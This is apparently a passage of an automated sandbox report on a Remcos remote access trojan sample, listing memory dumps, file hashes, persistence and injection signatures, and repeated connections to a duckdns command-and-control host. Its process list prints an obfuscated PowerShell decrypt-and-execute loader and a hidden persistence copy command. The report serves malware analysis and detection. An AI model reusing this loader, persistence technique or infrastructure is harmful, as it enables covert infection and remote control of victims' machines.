memory/4388-47-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-48-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-49-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-50-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-51-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-52-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-53-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-54-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-55-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-57-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-58-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-59-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-60-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-61-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-63-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-64-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-65-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-66-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-67-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-68-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-69-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-71-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-72-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-73-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-74-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-75-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-76-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-77-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-79-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-80-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-81-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-82-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-83-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-84-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-85-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\remcos\registros.dat
| MD5 | c30f9f6e957182ba5ab8a5e6125858b9 |
| SHA1 | de442537779bdafea69e0b2017adc5e382db92ff |
| SHA256 | 61672d6d56d78c037afa07f62daa17115ac68c3e04aefd4a4884addfb5de77c8 |
| SHA512 | 196a62b840aa7f4db1d8ec13562b6833bee7d873cf96fad7a2ae062549a44f42742908afd2ed11f99c6921254f16cf9591ef82aab585096f3dc5af1ad4bb7905 |
memory/4388-87-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-88-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-89-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-90-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-91-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-92-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-93-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-94-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-96-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-97-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-98-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-99-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-100-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-101-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-102-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-104-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-105-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-106-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-107-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-108-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-109-0x0000000000400000-0x0000000000482000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2023-12-05 18:38
Reported
2023-12-05 18:44
Platform
win11-20231128-en
Max time kernel
299s
Max time network
297s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3544 set thread context of 1916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 188.114.96.0:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | | tcp |
| CO | 181.142.162.155:4576 | | tcp |
| CO | 181.142.162.155:4576 | | tcp |
| CO | 181.142.162.155:4576 | | tcp |
| CO | 181.142.162.155:4576 | | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | | tcp |
| CO | 181.142.162.155:4576 | | tcp |
| CO | 181.142.162.155:4576 | | tcp |
| CO | 181.142.162.155:4576 | | tcp |
| CO | 181.142.162.155:4576 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ck4s2lbx.thz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3544-8-0x0000019FB0280000-0x0000019FB02A2000-memory.dmp
memory/3544-9-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp
memory/3544-10-0x0000019FB0270000-0x0000019FB0280000-memory.dmp
memory/3544-11-0x0000019FB0270000-0x0000019FB0280000-memory.dmp
memory/3544-12-0x0000019FB0270000-0x0000019FB0280000-memory.dmp
memory/3544-13-0x0000019FB0FB0000-0x0000019FB1756000-memory.dmp
memory/3544-15-0x0000019FB0310000-0x0000019FB031C000-memory.dmp
memory/3544-16-0x0000019FB0C30000-0x0000019FB0CA6000-memory.dmp
memory/3544-17-0x0000019FB0D70000-0x0000019FB0D8E000-memory.dmp
memory/1064-18-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp
memory/1064-20-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp
memory/1064-19-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp
memory/1064-29-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp
memory/1064-34-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp
memory/1916-35-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 88dc70c361a22feac57b031dd9c1f02f |
| SHA1 | a9b4732260c2a323750022a73480f229ce25d46d |
| SHA256 | 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59 |
| SHA512 | 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5746a9547ca0d2ff66b8de81e48ddc64 |
| SHA1 | 6e9cdbbdb0c65caf97fbcd8787d67749b55a6b5f |
| SHA256 | eedb2133a9344f6d8fdc81f8fd710954c165e8d88d9516be400f8a94132a8982 |
| SHA512 | f707a525cbb18c297badc0f1187f71aea9b650c7cfdc3ee727093adfa2cab1a83550b842d666e840b6099ccaa4acb5694567317cd62f10359298f720785f0a31 |
memory/1916-39-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3544-40-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp
memory/1916-41-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-43-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-44-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-46-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-47-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-48-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-49-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-50-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-51-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-52-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-53-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-54-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-55-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-57-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-58-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-59-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-60-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-61-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-62-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-64-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-65-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-66-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-67-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-68-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-69-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-70-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-72-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-73-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-74-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-75-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-76-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-77-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-78-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-80-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-81-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-82-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-83-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-84-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-85-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-86-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\remcos\registros.dat
| MD5 | da07760c88eb4c4e2b3fca9b87fc5972 |
| SHA1 | 27cba49a2c23c3a00f6226043661e09ee3e23f63 |
| SHA256 | c1cc350e3f0c1de9cd84dc402a2a8f3acdf6a0e7a5a7a9700339d8633312f74d |
| SHA512 | 8a76c611ae15b9c7c7faf061966c7c80a4ced75b77d652c8b09af44dc27b23bbfd9544992a9a34c64753c3ad420251e58d3b1743c8f8e64b22027f654e059842 |
memory/1916-88-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-89-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-90-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-91-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-92-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-93-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-94-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-96-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-97-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-98-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-99-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-100-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-101-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-102-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-103-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-105-0x0000000000400000-0x0000000000482000-memory.dmp
